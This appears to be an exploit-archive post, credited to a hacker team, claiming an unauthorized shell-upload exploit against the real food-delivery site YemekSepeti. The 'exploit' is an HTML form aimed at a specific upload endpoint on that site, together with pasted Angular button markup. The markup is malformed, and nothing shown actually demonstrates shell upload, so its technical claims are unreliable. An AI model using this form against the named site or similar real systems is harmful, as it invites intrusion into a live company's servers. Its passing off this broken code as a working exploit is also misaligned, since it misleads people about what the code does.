YemekSepeti Unauthorized Shell Upload Exploit

2020.03.07

Gaddar (TR)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

Vulnerability Title : YemekSepeti Unauthorized Shell Upload Exploit - Discovered By Gaddar

Author : Gaddar
Team : SiyahBayrak

Payload : Step_VM.uploadFileFor(attachment)

Exploit; 

<form method="POST" action="https://portakal.yemeksepeti.com/attachment/file-up.php" enctype="multipart/form-data" > 
<div ng-if="attachment.FileInformationList.length == 0" ng-init="fileInfo=attachment.FileInformationList[0]">
                            <p class="text-center">
                                <button class="btn-material btn-sm btn-upload mt-29" id="uploadButton_2" ng-click="Step_VM.uploadFileFor(attachment)">
<button class="btn-material btn-sm btn-upload" id="uploadButton_0" ng-click="Step_VM.uploadFileFor(attachment)">
                                    Select File
                                </button>
                                    <i class="fa fa-cloud-upload"></i> Submit
                                </button>
                            </p>
                        </div>

ScreenShot;
https://ibb.co/3B5ZRBR

My social accounts ;
Instagram.com/pt.php
Facebook.com/ptsec
Twitter.com/ptguvenlik
Youtube.com/c/gaddarsec

My Teammates : DeadLy-Warrior - StabilBey - Diablo

See this note in RAW Version

Vote for this issue:

44%

56%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

YemekSepeti Unauthorized Shell Upload Exploit

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.